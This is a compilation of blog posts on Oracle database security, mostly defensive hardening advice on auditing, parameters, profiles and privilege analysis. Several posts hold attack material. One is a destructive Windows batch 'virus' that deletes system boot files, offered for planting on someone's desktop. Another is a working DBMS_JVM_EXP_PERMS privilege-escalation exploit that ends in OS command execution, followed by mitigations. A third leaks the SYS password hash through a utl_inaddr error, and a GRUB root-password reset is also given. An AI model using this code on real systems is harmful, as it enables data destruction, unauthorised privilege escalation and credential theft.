Me, Security & Oracle

A lot of questions come to my mind when I start talking about Oracle security: how do I secure my databases, and what should I do?
Is adding a firewall to my network enough? Will enabling the Oracle audit parameter be enough?
Understanding security as a concept is very important for reducing the risk of attack, and to do that you should make sure your system is secure.
Having security awareness is the first step to securing the system.

According to RSA reports, there was a 7% increase in the number of phishing attacks worldwide between July and August 2010. The United States currently leads as the country that suffered the most attacks in regard to online cyber threats, with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
The graph below shows the number of network security breaches over the past 12 months (graph made by the Ponemon Institute).
In addition to the above reports, $1 trillion was the total value of intellectual property that hackers stole from businesses around the world in 2008.
As proof of this, I will mention three different stories about the biggest “black hat” hackers.
The graph below shows how much cyber-attacks cost companies over 12 months (graph made by the Ponemon Institute).
Jonathan James was 16 years old when he hacked NASA, which made him the first juvenile sent to prison. He installed a backdoor into a Defense Threat Reduction Agency server and jacked into NASA computers, stealing software worth $1.7M and costing NASA $41,000 in repairs.
Adrian Lamo hacked into the NY Times and Microsoft using coffee shop Wi-Fi, and viewed personal information and high-profile subject matter.
The last example is Kevin Mitnick, who spent two years stealing corporate secrets and breaking into the US national defense warning system.
Computer hacking is usually stereotyped in movies and cartoons as a guy sitting behind a desk with a Pepsi can and not much luck with the ladies. The truth is that this guy costs people and companies money and privacy; hacking therefore affects individuals, organizations and companies.
Individual victims of computer hacking can lose their savings, their privacy, even their lives. In the early days of computers the virus was the biggest security risk, causing data loss. After that it was replaced by malware, which is small software designed to do a job, such as a key logger or virus scanner, but this software is no longer any fun now that hackers are creating malware.
Nothing is easier today than writing a virus just to do annoying things; the code below is just an example of how a virus is written.
You can find the steps to write a virus, Trojan or even a worm on the internet for free. This is what makes the problem bigger, because an internal user can read this information and start using it, so you should be prepared for all these kinds of attacks.
Below is an example of a simple virus; all you have to do is save it as a batch file and put it on someone's desktop.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

What if the victim is a company or organization? The small effect a hacker could have is to put some employees out of work for a short period of time. The large effect is that a hacker could steal company secrets, cause data loss and do some damage. In the last survey by Ponemon Research on behalf of Juniper Networks, 90% of companies had been breached at least once by hackers over the past 12 months, and 60% reported two or more breaches over the past year.

So companies and organizations should spend a small fortune on security software and hardware, and let us not forget to educate our employees.
Security today is considered the most important priority for a company, for two reasons:
1- Personal data protection.
If you store data you should secure it, since it is related to customers or clients.
2- Social responsibility.

Some of this data is very important and contains people's private information, which tells us that a company should protect this information by securing its systems.
When you leave your house for work in the morning, or to hang out with friends in the evening, you make sure that your house is secure. Why? All this is to keep unauthorized people from access, damage and theft, by enabling the alarm system and making sure your doors and even your windows are locked. It is the same for companies and organizations: the same principle but with a different approach. The valuable thing in computers and networks is the data you create; this is the first reason why we have computers and networks.
An operating system can be reinstalled and hardware can be replaced, but we are talking about data, which is unique and sometimes irreplaceable.
Data is confidential and concerns people's privacy; this is the main reason why you don't want to lose it, and you don't want others to even view it without authorization: Visa information, mobile numbers, social numbers and account numbers.
If it is left unprotected then the information can be accessed by anyone, and if this information falls into the wrong hands, your life is a nightmare. Quite often, ensuring your data is protected is a small price to pay to avoid future problems and prevent threats.
What if the data is not adequately protected? Perhaps it is compromised, which is called a security breach. I am not talking here at the individual level but at the business level, where it causes problems such as loss of reputation and lawsuits.
According to the Ponemon Institute, the cost of a security breach during 2008 was $202 per record breached. Imagine if you have 1 million records: what could that cost the company?
Intruders do not care who you are or about your identity; they just want to control your computer. By doing this they can hide their location and start attacks.
By gaining access to the system, intruders discover new vulnerabilities to exploit in computer software. Don't forget it is a network, which means they can access other computers on the same network. Complex, right?
But what about the law? All the above information is just reports and security principles; check the law below that talks about security and data privacy.
Cheers
Osama Mustafa

SOA_SERVER (Managed Server) Takes Too Long to Start/Restart

On the WebLogic console, when trying to start a managed server, it takes too long to start; in my case it's SOA_SERVER, almost 25 min only to start, which is not correct. To avoid this problem you need to follow the steps below, simple but effective:

Under the Java home (the one used by WebLogic):

cd /u01/app/fmw/jdk/jre/lib/security

There's a file called java.security.

Edit this file using any editor (vi for example).

Search for the following line:

securerandom.source=file:/dev/urandom

And change it to:

securerandom.source=file:/dev/./urandom

Or, another way, add the line below to the startup script in WebLogic:

-Djava.security.egd=file:/dev/./urandom

Hope this will solve your problem.

Thank you
Osama Mustafa

Security Features 12c

As with any newer version of the database, Oracle has enhanced security. This time Oracle created new users for administration purposes.

Separation of user duties:

SQL> select username from dba_users where username like '%SYS%';

USERNAME
----------------------------------
SYS : Super user
SYSKM : Key management tasks
SYSDG : Data Guard management
SYSBACKUP : Backup management

DBMS_PRIVILEGE_CAPTURE

The Privilege Analysis feature allows you to: 
  • Define a privilege capture
  • Start a privilege analysis during a period of time
  • Delete capture analysis
The capture can be done on three levels:
  • User
  • Role
  • Context
To understand this new package, check the examples below:
sqlplus / as sysdba
SQL> create user test identified by test ;
SQL> grant create session to test ;
Grant succeeded.
SQL> grant select any table to test ;
Grant succeeded.
Create a new capture using this package:

exec SYS.DBMS_PRIVILEGE_CAPTURE.CREATE_CAPTURE ( -
        name           =>  'test_capture', -
        description    =>  'Capture_all_thing', -
        type           =>   dbms_privilege_capture.g_database)

Where:

Name : Package name
Description : What this package is for
type : depends on the level: users ( g_database ), role ( g_role ), context ( g_role_and_context )

We need to enable it to start the capture:

SQL> exec SYS.DBMS_PRIVILEGE_CAPTURE.ENABLE_CAPTURE (name => 'test_capture');
PL/SQL procedure successfully completed.

Up to here everything is fine. Now, to start capturing, you have to log out of SQL*Plus and do what you need to do.
SQL> conn test/test ;
Connected.
SQL> select * from osama.test ;
no rows selected
SQL> select * from osama.test2 ;
   TEST_ID TEST_NAME
---------- --------------------
         1 JENNIFER
         2 STEVE
         3 USER
Reconnect as / as sysdba to disable the capture, then generate the results as follows:
SQL> exec SYS.DBMS_PRIVILEGE_CAPTURE.DISABLE_CAPTURE (name => 'test_capture');
PL/SQL procedure successfully completed.
SQL> exec SYS.DBMS_PRIVILEGE_CAPTURE.GENERATE_RESULT (name => 'test_capture');
PL/SQL procedure successfully completed.

SQL> select username, object_owner, object_name, obj_priv
from   dba_used_objprivs
where  username in ('OSAMA', 'TEST');

USERNAME   OBJECT_OWNER OBJECT_NAME                    OBJ_PRIV
---------- ------------ ------------------------------ -------------------------
TEST       SYS          ORA$BASE                       USE
TEST       SYS          DBMS_APPLICATION_INFO          EXECUTE
TEST       SYS          DUAL                           SELECT
TEST       SYS          DUAL                           SELECT
TEST       SYSTEM       PRODUCT_PRIVS                  SELECT
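
Added example (not part of the original post): before the capture is dropped, its results can be used to replace the broad SELECT ANY TABLE grant given to TEST with grants on only the tables it actually read. It assumes `test_capture` has been disabled and GENERATE_RESULT has run; the DBA_USED_PRIVS and DBA_UNUSED_SYSPRIVS views and the G_CONTEXT capture type are standard privilege-analysis features not shown in the post, and `test_only_capture` is a hypothetical name.

```sql
-- Added example. Run as SYSDBA after GENERATE_RESULT and before DROP_CAPTURE.

-- 1. Which system privileges did TEST really exercise, and against which
--    objects? For an ANY privilege the view records the object it was used on.
SELECT username, sys_priv, object_owner, object_name
FROM   dba_used_privs
WHERE  capture  = 'test_capture'
AND    username = 'TEST'
AND    sys_priv IS NOT NULL
ORDER  BY sys_priv, object_owner, object_name;

-- 2. Which granted system privileges were never used while the capture was
--    enabled? These are candidates for revocation.
SELECT username, rolename, sys_priv
FROM   dba_unused_sysprivs
WHERE  capture  = 'test_capture'
AND    username = 'TEST'
ORDER  BY sys_priv;

-- 3. Generate narrow object grants that cover exactly what SELECT ANY TABLE
--    was used for (osama.test and osama.test2 in the walkthrough above).
SELECT DISTINCT
       'GRANT SELECT ON "' || object_owner || '"."' || object_name ||
       '" TO "' || username || '";' AS replacement_grant
FROM   dba_used_privs
WHERE  capture     = 'test_capture'
AND    username    = 'TEST'
AND    sys_priv    = 'SELECT ANY TABLE'
AND    object_name IS NOT NULL;

-- 4. After reviewing and running the generated grants, remove the broad one:
-- REVOKE SELECT ANY TABLE FROM test;

-- 5. A capture limited to the sessions of one user (context level) instead of
--    the whole database. 'test_only_capture' is a hypothetical name.
BEGIN
  DBMS_PRIVILEGE_CAPTURE.CREATE_CAPTURE(
    name        => 'test_only_capture',
    description => 'Privileges used by sessions of TEST',
    type        => DBMS_PRIVILEGE_CAPTURE.G_CONTEXT,
    condition   => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''TEST''');
END;
/
```

A capture only sees what ran while it was enabled, so keep it running long enough to cover periodic jobs before revoking anything it reports as unused.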
Drop the capture:
exec SYS.DBMS_PRIVILEGE_CAPTURE.DROP_CAPTURE (name => 'test_capture')
Thank you 
Osama mustafa

Oracle Security Topic, what you should be Afraid of ?

Again !!!!

SQL injection occurs when someone (hackers) writes web application code that accesses your database, where this code contains a special format.

As a DBA you need to understand who accesses the database, cooperate with developers and make sure they connect in a secure way, and use good SQL statements to avoid SQL injection. Because of this, don't rely on your firewall; always make sure you secure your database and your code before you start working on the firewall. I am not saying here that a firewall will not protect your database; yes, it will, but don't forget that these days we have devices and complex networks: wireless, iPads, mobiles, devices and laptops are connected to your network, so in that case the firewall will not protect you 100%. Secure for better reasons 🙂

Users connect to the database through the listener. Even if the database is down and the listener is up, a user can still open a connection to the database (which is what causes the problem). You can access the server because there is no authentication in the listener; there are lots of examples of this type of attack.

To solve this issue you need to patch and patch the OS and database to ensure all security bugs are fixed.

There are different types of Oracle vulnerabilities: buffer overflow, listener issues, misconfiguration, and PL/SQL, which points to SQL injection. Most of our fear is not of outside hackers/attackers but of internal ones such as employees: hacking lessons are online on the internet and free, and everyone wants to try them, mostly at work. In 2008, reports indicated that 26% of hacking issues happened because of employee ignorance.

Companies ignore the security side because of resources such as money and consultants, but they will not do that after they get hacked and lose everything: data and customer information.

Most companies have a network administrator and a system administrator, so if you secure the OS and network well, your database will be secure.

Thank you
Osama Mustafa

 

Oracle Security --> Where to Start? What to Do?

When you start reading the title you start thinking of a race. You may well think that, since technology is moving fast, but my article is not about a race. It is about where I should look when I secure my database, and what I should secure. I have posted other articles about security, how to secure your database and what the benefits of securing a database are. I will try to mention the most important points for securing and protecting the database, especially from internal users.

A database is complex, so the DBA (database administrator) must understand potential security impacts and the three-component triangle which I mentioned before in “Top ten Threats to Database”. For example, when DBAs look at availability they ignore correct configuration, which causes security vulnerabilities, and this can lead to exposing confidential data. It's not only about the database: if you have an application you need to take it over and start securing it. But what can I do? Where to start and how to start?

The basic steps to start with, as I mentioned in my post “basic Steps to Secure Oracle”, are to discuss the risk management that leads to this, and you can secure your database by looking at the keys below:

  • Auditing
  • Database Configuration
  • Access to database
  • Authentication


I need to remind you of something: security does not mean I will protect my database 100%; it is a way to prevent attacks and make them harder. But what if the attackers get into the database?

Auditing


Auditing allows us to monitor database users, or anything that happens on the database. First, the audit_sys_operations parameter should be set to TRUE to monitor SYS user operations. The audit_trail parameter (DB|OS) determines where the audit files will go: for example, audit records can be written to the database, or to the file system if you set this parameter to OS. Let's talk about the database here:

SQL> SELECT * FROM dba_obj_audit_opts;

SQL> SELECT * FROM dba_priv_audit_opts;
SQL> SELECT * FROM dba_stmt_audit_opts;

You cannot enable auditing to monitor all database activities, but at least you can enable it for actions such as create session, by running this command --> audit create session;

What I love in the 11gR2 documentation is that Oracle has created its own list of recommended audit settings, which means you should enable them. Another type of auditing, called FGA, allows you to create a policy that runs on a certain event: for example, when scott reads column Sal from table emp, I want to record this transaction in a table. Simply read more about --> DBMS_FGA.ADD_POLICY. To check these events you need to have access to sys.fga$.

After you enable auditing it's very important to create your own reports to monitor the database. Oracle gives you a product to centralize these audit logs, called Audit Vault; the benefit of this product is that it automatically cleans up the old data (only if it has been transferred to the server) and removes it.
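
Added example (not from the original post): the FGA policy described above for reads of SCOTT.EMP.SAL, followed by two report queries of the kind the last paragraph recommends. It assumes the standard SCOTT.EMP demo table exists and that audit_trail is set to DB; the policy name `EMP_SAL_READ`, the one-day window and the threshold of 5 failed logons are constructed for illustration.

```sql
-- Added example. Run as a user with EXECUTE on DBMS_FGA and SELECT on the
-- audit views (for instance SYSDBA).

-- 1. Record every SELECT that touches the SAL column of SCOTT.EMP,
--    including the SQL text and bind values (DB + EXTENDED).
BEGIN
  DBMS_FGA.ADD_POLICY(
    object_schema   => 'SCOTT',
    object_name     => 'EMP',
    policy_name     => 'EMP_SAL_READ',   -- hypothetical policy name
    audit_column    => 'SAL',
    statement_types => 'SELECT',
    audit_trail     => DBMS_FGA.DB + DBMS_FGA.EXTENDED,
    enable          => TRUE);
END;
/

-- 2. Report: who read salaries in the last day, from which host, how often.
SELECT db_user,
       os_user,
       userhost,
       COUNT(*)       AS salary_reads,
       MIN(timestamp) AS first_seen,
       MAX(timestamp) AS last_seen
FROM   dba_fga_audit_trail
WHERE  policy_name = 'EMP_SAL_READ'
AND    timestamp   > SYSDATE - 1
GROUP  BY db_user, os_user, userhost
ORDER  BY salary_reads DESC;

-- 3. Report built on "audit create session": accounts with repeated failed
--    logons (ORA-01017) in the last day. The threshold of 5 is constructed.
SELECT username,
       os_username,
       userhost,
       COUNT(*) AS failed_logons
FROM   dba_audit_session
WHERE  returncode = 1017
AND    timestamp  > SYSDATE - 1
GROUP  BY username, os_username, userhost
HAVING COUNT(*) >= 5
ORDER  BY failed_logons DESC;

-- 4. Remove the policy when it is no longer needed.
-- BEGIN
--   DBMS_FGA.DROP_POLICY('SCOTT', 'EMP', 'EMP_SAL_READ');
-- END;
-- /
```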

Database Configuration

When I start talking about secure configuration a lot of steps come to my mind, but I will try to keep it simple since I can't cover everything in this topic; I will divide it into more than one topic and post them on my blog. As you know, in this part you have to look at the network, listener, client side, parameters and backup; I apologize if I forgot something. Each of these components is very important, but let's talk about parameters. As we all know, the database has something called the spfile/pfile, which is the parameter file for the database. Some parameters are set to TRUE by default while I don't need them, and vice versa. Changing the values of these parameters is important to avoid any weakness in the future. Some of these parameters are:

  • OS_ROLES --> Should be False
  • os_authent_prefix --> Ops$
  • o7_dictionary_accessibility --> Should be False
  • audit_sys_operations --> Should be True
  • Global_name --> Should be True
  • Remote_listener --> use it only if you need it
  • remote_login_passwordfile --> none
  • sec_case_sensitive_logon --> Should be True
  • sql92_security --> Should be True
  • remote_os_roles --> Should be False

There are a lot of parameters, but I have mentioned some of them.
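
Added example (not from the original post): one query that compares the running instance against the list above and flags every parameter that differs. The expected values are the ones this post gives; it assumes "Global_name" refers to the `global_names` parameter, and it treats `remote_listener` as acceptable only when unset, so a set value is flagged for a manual decision.

```sql
-- Added example. Run as a user with SELECT on V$PARAMETER.
WITH baseline (name, expected) AS (
  SELECT 'os_roles',                    'FALSE' FROM dual UNION ALL
  SELECT 'os_authent_prefix',           'OPS$'  FROM dual UNION ALL
  SELECT 'o7_dictionary_accessibility', 'FALSE' FROM dual UNION ALL
  SELECT 'audit_sys_operations',        'TRUE'  FROM dual UNION ALL
  SELECT 'global_names',                'TRUE'  FROM dual UNION ALL  -- assumed meaning of "Global_name"
  SELECT 'remote_listener',             NULL    FROM dual UNION ALL  -- "only if you need it"
  SELECT 'remote_login_passwordfile',   'NONE'  FROM dual UNION ALL
  SELECT 'sec_case_sensitive_logon',    'TRUE'  FROM dual UNION ALL
  SELECT 'sql92_security',              'TRUE'  FROM dual UNION ALL
  SELECT 'remote_os_roles',             'FALSE' FROM dual
)
SELECT b.name,
       p.value                                 AS current_value,
       NVL(b.expected, '(unset unless needed)') AS expected,
       CASE
         -- Parameter does not exist in this release (removed or renamed).
         WHEN p.name IS NULL                            THEN 'NOT FOUND'
         -- "Use only if needed": fine when empty, otherwise a human decides.
         WHEN b.expected IS NULL AND p.value IS NULL    THEN 'OK'
         WHEN b.expected IS NULL                        THEN 'REVIEW'
         WHEN UPPER(p.value) = b.expected               THEN 'OK'
         ELSE 'REVIEW'
       END                                     AS status
FROM   baseline b
LEFT   JOIN v$parameter p
       -- Some names are stored in upper case (O7_DICTIONARY_ACCESSIBILITY).
       ON LOWER(p.name) = b.name
ORDER  BY status DESC, b.name;

-- Example of correcting one REVIEW row. sql92_security is a static
-- parameter, so the change goes to the spfile and needs a restart:
-- ALTER SYSTEM SET sql92_security = TRUE SCOPE = SPFILE;
```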

Also, don't forget to secure your listener: set a password for the listener and change the default port. These are simple steps, but they help you avoid future attacks.
Another point: don't forget to patch your database. Check the Oracle site for new CPU and PSU patches; this will fix security vulnerabilities. Read more here.
Another way to secure the configuration is to use a database firewall (I will post a topic about it later), a network firewall, and to create a policy inside the company.

Access to database


I talk about this in each topic I post, and I will mention it in every topic in the future. It's important, and most hacking cases happen because a user has more privileges than he needs. Why? Is your data not important? When the user is authenticated to the database, the first thing you need to check is what this user is allowed to do, especially for developers and application users (does he need the DBA role to execute a procedure?).

SQL> SELECT * FROM dba_sys_privs;
SQL> SELECT * FROM dba_role_privs;
SQL> SELECT * FROM dba_col_privs;
SQL> SELECT * FROM dba_tab_privs;

It's not only about privileges. Creating development, test and QA databases is important; not everything that works on production is correct. Create new users with different privileges, some of them to monitor and some of them to manage. Boring but useful. Don't forget database links: I mentioned before, in my topics about database link security, how these could affect your database. Links create new paths for privilege escalation. Review database links and check who accesses them, who uses them, how they use them, and whether they are still valid.

SQL> SELECT * FROM sys.link$;

In conclusion, you have to check user privileges, application users, users and database links, and create a new instance for new jobs. Not all companies spend money to secure their databases, but why should I buy new products while I am not doing the basic steps first? It may save the company a small fortune, and they will love you for that.

Authentications

Well, I should have mentioned this first, but it's all about security, so why should I care? The first thing that happens in the database is authentication: obtaining the user's information and password. The problem is that there are multiple ways of doing that, which makes the risk high: you have OS authentication, etc. Check my post about “Effect of Default Password” and you will be surprised what I can do with a default password! In 11g you can check for default passwords in a new view:

SQL> select * from dba_users_with_defpwd;

But you also can't forget about:

SQL> select * from dba_users;

Each of them has a different job; not everything is mentioned in dba_users_with_defpwd. Once you have changed the password and created a new one (hard to guess), you need to provide new rules for passwords. Here we start talking about profiles:

SQL> select * from dba_profiles;

Example of how to create a profile in Oracle:

CREATE PROFILE Example LIMIT
  FAILED_LOGIN_ATTEMPTS 3 
  PASSWORD_LOCK_TIME 5    
  PASSWORD_LIFE_TIME 30   
  PASSWORD_GRACE_TIME 3   
  PASSWORD_REUSE_TIME 120 
  PASSWORD_REUSE_MAX 10   
/

Also read Oracle documentation here.

I will talk later about authentication types in Oracle, with examples, and discuss which one is more secure and when I need to use it.

Don't forget that Oracle provides password complexity checking, located in $ORACLE_HOME/rdbms/admin in a script called --> utlpwdmg.sql. Just run it as / as sysdba and the new rules will be applied to passwords; you can also create your own. This script does the following:

  • The password contains eight characters or more.
  • The password is not the same as the username.
  • The password should not be simple.
  • The password should contain numeric and alphabetic characters.
  • The password should be different from the last password.

And other features. Simple and amazing, right? 🙂

In conclusion, I will post more topics about security, and more examples are on the way. I hope this is useful and simple. I can't cover everything in one article, as it would be huge, but I will try to do my best.

Thank you
Osama Mustafa

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

DBMS_JVM_EXP_PERMS is a package that allows any user with the create session privilege to grant themselves Java IO privileges. It was identified by David Litchfield. You also need to know that this way of hacking only works on Windows, and that the affected Oracle database versions are 10gR2, 11gR1 and 11gR2.

The demonstration below explains how it is used:

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
‘GRANT’,’GREMLIN’,’SYS’,’java.io.FilePermission’,'<FILES>>’,’execute’,’ENABLED’ FROM DUAL; 
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;
  /

PL/SQL procedure successfully completed.

SQL> CONNECT / AS SYSDBA
Connected.

SQL> COL TYPE_NAME FOR A30;
SQL> COL NAME FOR A30;
SQL> COL ACTION FOR A10;
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

TYPE_NAME                      NAME                           ACTION
------------------------------ ------------------------------ ----------
java.io.FilePermission         <>                  execute

As you see, at first the user Test only has the create session privilege, but after using the above package he can now execute any OS command using Java code.

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

To secure your database against this:

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on "oracle/aurora/util/Wrapper" from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Thank you
Osama Mustafa

Hack Sys Password With Simple Way

Sometimes you want to know the SYS password in the simplest way. Well, check the below: if you have any user with the DBA role then you can do that:

SQL>  select utl_inaddr.get_host_name((select username||’=’||password from dba_users where rownum=1)) from dual;

 select utl_inaddr.get_host_name((
        *
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097A unknown
ORA-06512: at “SYS.UTL_INADDR”, line 4
ORA-06512: at “SYS.UTL_INADDR”, line 35
ORA-06512: at line 1

Now you can use any software or online site to hack this password.

Thank you
Osama Mustafa

Basic Database Security Guidelines

Implementing database security is not an easy process; it is complex, since security has to be looked at in the OS layer, database, network, application code and backup. There are a lot of things you need to check if you need a secure database, and you can't ignore any one of these components.

You need to know that even experts/gurus do not have a complete understanding of this list; maybe they have knowledge about it, but not that much. But the most important thing in securing a database (a new one) or an application is understanding the security model very early in the development process, and how to develop it. You can read the book “Oracle security: Step-by-step” by Pete Finnigan; he mentions a lot of basic steps to secure an Oracle database.

From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example, if we ask ourselves as DBAs about SQL injection, one of the top ten threats to databases:
it happens because somebody is writing a web application that accesses your database, which means that if this code is written incorrectly, what happens if a hacker gets access to your database through it? Because of this the DBA needs to understand who is accessing the database and make sure the developers are accessing it in a secure way.

An internal/external hacker is going to search for holes in your application to get in. As we know, one of the attack types used is called buffer overflow; because of this you need to keep your system up to date and patched. Most people don't do that, since they worry that a patch will break their system or application.

Today a lot of people are ignoring the security side of the job. Many companies don’t have the resources. Until you get hacked, and until you lose data, then you think you can get by with minimal security.

I mentioned before, in my article about basic steps to secure Oracle Database, some of these points with examples. I advise you today to bookmark this to keep updated with Oracle security patches. There are a lot of tips to talk about, and I need to share them here as soon as I can.

Thank you
Osama Mustafa

Reset/Hack Linux Root Password ( Unprotected GRUB )

Do you want to learn something new? Hack/reset the Linux root password. Then continue reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What if I forget the root password? Check the below.

Restart the server and you should see this screen; pause it by pressing an arrow key:

Second, press “a”, then add “1” as in the screen below; when finished, press Enter:

Now a black screen:

Print “Runlevel”

and reset the root password as below by typing the “passwd” command:

Note: this way works with Red Hat, Fedora and CentOS; I didn't try it on Ubuntu.

Thank you
Osama mustafa




Oracle Database vs Sql Server Security

Which one is the more secure ?

The above question has been asked before and will be asked today and in the future, but what is the answer? Before starting to answer this question you need to discuss some points.

As an introduction, SQL Server is a database product from Microsoft Corporation with the following version list:

  • SQL Server 2012
  • SQL Server 2008 R2
  • SQL Server 2008
  • SQL Server 2005
  • SQL Server 2000
  • SQL Server 7.0
On the other hand we have Oracle Database, which is an RDBMS (Relational Database Management System) with the following version list:
 
  • Oracle7
  • Oracle8 Database
  • Oracle8i Database
  • Oracle9i Database
  • Oracle Database 10g
  • Oracle Database 11g
Each database version includes new features, which could be related to high availability, database features or security features. I try to be fair in my judgment. Let's go back to the question: which is more secure, Oracle Database or Microsoft SQL Server, and why?
I read a lot of research regarding this question and most of it claims that SQL Server is more secure than Oracle Database, but why? Oracle is the best database for large organizations and can store more data with great security; when I say great security, there are lots of products from Oracle such as Database Vault, Audit Vault and Data Masking. But small solutions and organizations mostly use SQL Server.
I read this report by David Litchfield here; it was published in November 2006 and claims that SQL Server is more secure than Oracle Database. You also need to know, while comparing these two databases, the main differences between them:
Microsoft SQL Server only works on one platform (Windows), is easy to manage, with most of the administration done through a GUI (very friendly), is simple to install, and SQL Server costs less than Oracle ( Cost much more than less ) in licensing fees. All this leads me to the following:
  • Since SQL Server is easy to install and administer, the performance is usually fine.
  • The only way to scale a system built on SQL Server technology is to add more memory and CPU to the single server hosting the database.
  • As mentioned before, SQL Server supports only one platform.
On the other hand, Oracle supports all platforms (Linux, Unix, Windows, HP, AIX and Sun, and sorry, I forgot to mention others). I will not say it's easy to install, but the documentation is available for free, and if you follow it you will not be lost. Oracle Database is an enterprise solution, which means a database that stores huge amounts of data, supports high availability clusters (SQL Server does not support it) and introduces a lot of backup and recovery solutions, Data Guard being one of them. Because of this it's expensive and costly for the company. Don't forget the main reason: an Oracle DBA's salary is higher than a SQL Server DBA's, which means companies will study this case before looking for solutions.
Also, to be fair, Oracle support takes some time to answer you and solve the issue or database vulnerability, whereas SQL Server support is amazing and solves the issue or database vulnerability in 24 hours or less.
Since Oracle Database is used by large organizations such as financial and insurance companies, it is the target of hackers (I would like to mention here that a hacker is not looking for a small company to hack; he needs something that will be worth it if he gets caught), which puts it under attack. In my articles I have mentioned that no system is 100% secure, but you can make it harder for any hacker to access your data, and Oracle provides products to do that: Database Vault, Audit Vault, Database Firewall and encryption.
Another point I would like to mention here (take it also as a point when you compare): Oracle works on more than one platform. So will focusing on security for one platform be the same as security for five, six or more platforms? You should answer this question, not me!
Oracle has the capacity to run large databases and has many performance improvement features; the performance work can include hardware or the database (SQL Server, only hardware). Which is more secure?
It's completely up to you, but don't miss or ignore the points I mentioned before in this article.
Thank you
Osama Mustafa